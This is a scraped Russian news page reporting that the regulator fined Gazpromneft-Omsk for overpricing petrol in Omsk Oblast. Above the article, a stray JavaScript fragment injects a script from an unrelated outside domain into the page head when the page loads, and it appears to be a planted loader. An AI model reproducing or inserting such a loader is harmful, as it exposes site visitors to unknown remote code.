, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
31 января, 2013 Новости региона

ОАО «Газпромнефть-Омск» оштрафовали за завышение цен на бензин в Прииртышье

«Газпромнефть-Омск» вновь оштрафовали за завышение цен на бензин в Прииртышье

Сбытовая компания «Газпромнефть-Омск» продавала в Омской области бензин дороже, чем в других регионах Сибирского федерального округа, за что и была оштрафована антимонопольщиками на 300 тыс. рублей. Это далеко не первый случай разногласий между УФАС и сбытовиками. Совсем недавно, в декабре 2012 года, «ГПН-Омск» заплатила 650 тыс. рублей за «ущемление интересов мелкооптовых покупателей бензина».

Как сообщает пресс-служба ведомства, в марте 2009 года Омское УФАС России признало действия ОАО «Газпромнефть-Омск», злоупотреблением доминирующим положением и нарушением части 1 статьи 10 Федерального закона «О защите конкуренции». Поводом послужило установление экономически и технологически необоснованных розничных цен на нефтепродукты в 2007 году и за 9 месяцев 2008 года на товарных рынках розничной реализации бензинами автомобильными и дизельным топливом в Омской области.

Согласно вынесенному впоследствии предписанию в Омской области предприятие должно было установить более низкие розничные цены на топливо, поставляемое с ОАО «Газпромнефть – ОНПЗ», чем в соседних регионах: Алтайском и Красноярском краях, Кемеровской, Новосибирской, Томской и Тюменской областях.

Однако проверка антимонопольной службой омского сбытового подразделения «Газпромнефти» в 2012 году показала, что цены на АЗС в других регионах остались ниже, чем в Омске. В связи с неисполнением предписания на ОАО «Газпромнефть-Омск» был наложен административный штраф в 300 тысяч рублей.

Отметим, что ранее омские антимонопольщики в апреле 2012 года усмотрели в деятельности сбытовой компании «злоупотребление доминирующим положением». По данным УФАС, предприятие навязывало невыгодные условия поставки топлива мелкооптовым компаниям, необоснованно прекращала или ограничивала поставки, а также могла в одностороннем порядке расторгнуть договор. За игнорирование предписание по устранению выявленных нарушений «Газпромнефть-Омск» оштрафовали на 650 тыс. рублей.

Между тем цены на бензин в Омской области продолжают неуклонно расти. В среду, 30 января, бензин А-92 подорожал до 27,3 рубля, А-95 до 29,3 рубля за литр, а 98-й до 30,8 рубля. Это на 30-40 копеек больше, чем платили за литр бензина 29 января.

Владимир Войтович

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Новости региона